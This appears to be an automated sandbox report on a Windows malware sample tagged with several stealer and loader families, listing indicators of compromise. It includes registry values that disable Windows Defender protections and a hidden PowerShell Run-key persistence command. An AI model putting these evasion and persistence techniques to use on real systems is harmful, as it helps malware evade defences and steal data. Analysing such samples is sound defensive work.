Malware Analysis Report

2025-08-05 16:12

Sample ID 231026-ky4txafd31
Target db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716
SHA256 db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716
Tags
amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 grome kinza up3 backdoor discovery dropper evasion infostealer loader persistence rat stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716

Threat Level: Known bad

The file db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716 was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 grome kinza up3 backdoor discovery dropper evasion infostealer loader persistence rat stealer trojan

Detect ZGRat V1

Glupteba payload

Glupteba

RedLine payload

DcRat

RedLine

Raccoon

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

ZGRat

Raccoon Stealer payload

Amadey

Modifies Windows Defender Real-time Protection settings

Drops file in Drivers directory

Downloads MZ/PE file

Stops running service(s)

Modifies Windows Firewall

Checks computer location settings

Windows security modification

Executes dropped EXE

Loads dropped DLL

Checks installed software on the system

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Uses Task Scheduler COM API

Creates scheduled task(s)

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-26 09:01

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-26 09:01

Reported

2023-10-26 09:04

Platform

win10v2004-20231023-en

Max time kernel

112s

Max time network

153s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\A298.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\A298.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\A298.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\A298.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\A298.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\A298.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\A345.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9EEB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A053.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A1EB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A298.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A345.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A4DC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C7D7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\FEE7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Program Files (x86)\Drive Tools\zDriveTools.exe N/A
N/A N/A C:\Program Files (x86)\Drive Tools\zDriveTools.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\98E6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\A298.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\A298.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\C7D7.exe'\"" C:\Users\Admin\AppData\Local\Temp\C7D7.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\9EEB.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Drive Tools\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\Drive Tools\zDriveTools.exe C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-QHIS9.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-92N1I.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-346PL.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-NHV86.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-UDRBQ.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-35863.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-TJOHU.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-Q39LK.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\Lang\is-3MU64.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-K1T3V.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-KVQLA.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-KNKI9.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-2JNJ9.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-J503B.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-7415O.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-UGRQO.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-9MS75.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-1D08O.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files (x86)\Drive Tools\is-SNUM9.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-FOIIJ.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-F63PC.tmp C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\A4DC.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2181 = "Astrakhan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2061 = "North Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
